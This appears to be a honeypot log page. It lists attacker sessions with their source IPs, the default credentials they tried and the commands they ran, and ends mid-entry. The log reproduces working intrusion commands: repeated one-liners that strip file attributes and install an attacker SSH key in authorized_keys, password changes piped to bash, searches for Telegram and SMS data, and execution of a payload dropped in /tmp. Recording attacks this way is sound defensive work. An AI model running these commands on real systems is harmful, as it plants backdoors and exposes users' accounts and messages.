Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 fika_root (83.233.242.192) — Malmo, Sweden · 1 session · 9 cmds

2026-04-12 12:53 EDT · as root/root

root/root login → /ip cloud print → ifconfig → uname -a → cat /proc/cpuinfo → ps | grep '[Mm]iner' → ps -ef | grep '[Mm]iner' → ls -la ~/.local/share/TelegramDesktop/tdata /home//.local/share/TelegramDesktop/tdata /dev/ttyGSM → locate D877F7

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 phantom_root_32 (5.187.97.40) — Pointe-à-Pitre, Guadeloupe · 3 sessions · 27 cmds

2026-03-27 22:32 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print ×3

$ ifconfig ×3

↳ network mapping

$ uname -a ×3

↳ OS/kernel identification

$ cat /proc/cpuinfo ×3

↳ CPU profiling

$ ps | grep '[Mm]iner' ×3

$ ps -ef | grep '[Mm]iner' ×3

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ×3

$ locate D877F783D5D3EF8Cs ×3

$ echo Hi | cat -n ×3

🎭 cosmo_root_2 (158.160.220.42) — Moscow, Russia · 3 sessions · 3 cmds

2026-04-12 09:14 EDT · as root/1234

hostname discovery → uname → OS/kernel identification

$ hostname

↳ hostname discovery

$ uname -m 2>/dev/null || echo unknown

$ uname -a

↳ OS/kernel identification

🎭 jade_root_10 (140.246.70.45) — Jinan, China · 1 session · 2 cmds

2026-04-12 03:26 EDT · as oracle/oracle16!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 liberty_root_9 (52.176.211.73) — Des Moines, United States · 1 session · 2 cmds

2026-04-12 02:38 EDT · as oracle/Oracle2026!@#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 star_sol_3 (92.118.39.95) — Dallas, United States · 128 sessions · 128 cmds

2026-03-02 03:16 EST · as eth/eth, jito/jito, sol/123

Ran uname 160x across 160 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×128

↳ obfuscated system check

🎭 pretzel_root_5 (77.239.101.129) — Frankfurt am Main, Germany · 1 session · 20 cmds

2026-04-12 00:24 EDT · as oracle/oracle20!

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo ssh-rsa key → cat /proc/cpuinfo | grep name | wc -l → echo oracle20!/jwZMZate7Lgm|passwd|bash → Enter new UNIX password: → echo oracle20!/jw

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "oracle20!\njwZMZate7Lgm\njwZMZate7Lgm"|passwd|bash

$ Enter new UNIX password:

$ echo "oracle20!\njwZMZate7Lgm\njwZMZate7Lgm\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wraith_root_8 (179.32.33.161) — Medellín, Colombia · 1 session · 2 cmds

2026-04-12 00:07 EDT · as oracle/oracle@2026

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 eagle_db (74.94.234.151) — West Bloomfield, United States · 1 session · 2 cmds

2026-04-12 00:06 EDT · as oracle/oracle20!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_root_23 (152.32.174.67) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-12 00:02 EDT · as oracle/oracle@2026

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_31 (5.37.170.75) — Muscat, Oman · 1 session · 9 cmds

2026-04-11 23:20 EDT · as root/root

SSH brute-force root/root login → network interface enumeration (ifconfig) → OS fingerprinting (uname -a, /proc/cpuinfo) → active cryptomining process scan (ps | grep '[Mm]iner') → Telegram data directory reconnaissance (tdata, ttyGSM) → binary signature search (locate D877F783D5D3EF8Cs)

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 windmill_sol (80.94.92.171) — Amsterdam, The Netherlands · 147 sessions · 147 cmds

2026-02-28 05:30 EST · as sol/123, sol/sol, ubuntu/ubuntu

Ran uname 176x across 176 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×147

↳ obfuscated system check

🎭 shadow_pi_2 (79.117.28.95) — Castelló de la Plana, Spain · 2 sessions · 3 cmds

2026-04-11 21:16 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x iymvBvxY && bash -c ./iymvBvxY

↳ make executable

$ ./iymvBvxY

↳ execute payload

$ scp -t /tmp/iymvBvxY

↳ execute from /tmp

🎭 ghost_root_60 (151.115.57.14) — Warsaw, Poland · 13 sessions · 13 cmds

2026-04-11 20:32 EDT · as admin/123456, admin/admin, admin/password

Ran uname 13x across 13 sessions — automated OS fingerprinting.

$ uname -a ; echo 'vT' ×13

🎭 cipher_root_53 (110.93.219.131) — Lahore, Pakistan · 1 session · 2 cmds

2026-04-11 19:56 EDT · as oracle/oracle25

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 yankee_root_6 (72.17.34.38) — Winter Park, United States · 1 session · 2 cmds

2026-04-11 19:54 EDT · as oracle/oracle25

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 yankee_root_8 (172.190.89.127) — Boydton, United States · 2 sessions · 4 cmds

2026-04-06 04:16 EDT · as oracle/oracle1, oracle/oracle25

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 eagle_root_13 (12.156.67.18) — Oakland, United States · 2 sessions · 4 cmds

2026-04-11 17:36 EDT · as oracle/Oracle06, oracle/Oracle2025!@#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 cowboy_root_10 (172.208.62.162) — Boydton, United States · 1 session · 1 cmd

2026-04-11 15:18 EDT · as root/12345678

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 wraith_root_40 (37.221.67.130) — Chisinau, Moldova · 1 session · 2 cmds

2026-04-11 14:05 EDT · as oracle/oracle08

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 lantern_root_17 (139.198.29.172) — Longtan, China · 1 session · 1 cmd

2026-04-11 12:37 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 panda_root_12 (58.251.255.139) — Guangzhou, China · 1 session · 1 cmd

2026-04-11 12:31 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 pretzel_root_6 (87.106.46.37) — Berlin, Germany · 1 session · 2 cmds

2026-04-11 12:15 EDT · as oracle/Oracle2026!@#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 samba_root_3 (191.17.128.97) — São Paulo, Brazil · 1 session · 2 cmds

2026-04-11 11:41 EDT · as oracle/oracle21!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wok_root_24 (101.126.155.86) — Haidian, China · 1 session · 2 cmds

2026-04-11 11:10 EDT · as oracle/Oracle!@#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cowboy_sol_2 (142.248.80.104) — Wilmington, United States · 1 session · 1 cmd

2026-04-11 10:51 EDT · as root/password

uptime check

$ uptime

↳ uptime check

🎭 lantern_root_18 (180.130.116.170) — Kunming, China · 1 session · 1 cmd

2026-04-11 10:30 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 jade_root_11 (14.103.123.19) — Beijing, China · 1 session · 2 cmds

2026-04-11 09:42 EDT · as oracle/Oracle24

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 panda_root_13 (60.205.226.171) — Beijing, China · 1 session · 1 cmd

2026-04-11 09:29 EDT · as root/12345678

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 specter_root_2 (204.168.220.82) — Helsinki, Finland · 18 sessions · 18 cmds

2026-04-04 11:58 EDT · as root/1234, root/123456, root/12345678

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ hostname; echo '___BSEP_A1B2C3___'; uname -a; echo '___BSEP_A1B2C3___'; whoami; echo '___BSEP_A1B2C3___'; pwd; echo '___BSEP_A1B2C3___'; ls -la /; echo '___BSEP_A1B2C3___'; ps aux | head -15; echo '___BSEP_A1B2C3___'; netstat -tulpn | head -10; echo '___BSEP_A1B2C3___'; history | tail -5; echo '___BSEP_A1B2C3___'; ssh -V 2>&1; echo '___BSEP_A1B2C3___'; uptime; echo '___BSEP_A1B2C3___'; mount | head -5; echo '___BSEP_A1B2C3___'; env | head -10; echo '___BSEP_A1B2C3___'; cat /etc/os-release 2>/dev/null | head -6; echo '___BSEP_A1B2C3___'; grep MemTotal /proc/meminfo 2>/dev/null; echo '___BSEP_A1B2C3___'; df -h / 2>/dev/null | tail -1; echo '___BSEP_A1B2C3___'; cat /proc/version 2>/dev/null; echo '___BSEP_A1B2C3___'; grep 'model name' /proc/cpuinfo 2>/dev/null | head -1; echo '___BSEP_A1B2C3___'; cat /etc/issue 2>/dev/null; echo '___BSEP_A1B2C3___'; last -n 3 2>/dev/null | head -3; echo '___BSEP_A1B2C3___'; ls /dev 2>/dev/null | wc -l; echo '___BSEP_A1B2C3___'; ls /var/log 2>/dev/null | wc -l; echo '___BSEP_A1B2C3___'; ls /opt 2>/dev/null; echo '___BSEP_A1B2C3___'; crontab -l 2>/dev/null | head -5; echo '___BSEP_A1B2C3___'; nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null ×18

↳ persistence setup

🎭 cipher_root_54 (68.183.182.130) — Singapore, Singapore · 1 session · 1 cmd

2026-04-11 04:13 EDT · as oracle/oracle1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_20 (101.36.108.213) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-11 02:39 EDT · as oracle/oracle31

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 star_root_9 (52.159.227.3) — San Francisco, United States · 2 sessions · 2 cmds

2026-04-11 00:05 EDT · as root/1234, root/12345678

OS/kernel identification → ps

$ uname -a

↳ OS/kernel identification

$ ps aux | head -10

🎭 cowboy_root_11 (68.220.61.160) — San Francisco, United States · 2 sessions · 2 cmds

2026-04-10 23:48 EDT · as root/1234, root/123456

hostname discovery → pwd

$ hostname

↳ hostname discovery

$ pwd

🎭 burger_root_5 (165.227.22.224) — Santa Clara, United States · 1 session · 1 cmd

2026-04-10 23:24 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 lantern_root_19 (120.48.147.81) — Beijing, China · 1 session · 2 cmds

2026-04-10 22:45 EDT · as oracle/oracle1

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_root (20.164.21.26) — Johannesburg, South Africa · 70 sessions · 70 cmds

2026-03-22 18:01 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 35x across 35 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×70

🎭 panda_root_14 (120.48.87.166) — Beijing, China · 1 session · 19 cmds

2026-04-10 19:57 EDT · as root/admin

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "root:zgAzPaywe80E"|chpasswd|bash → rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo >

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

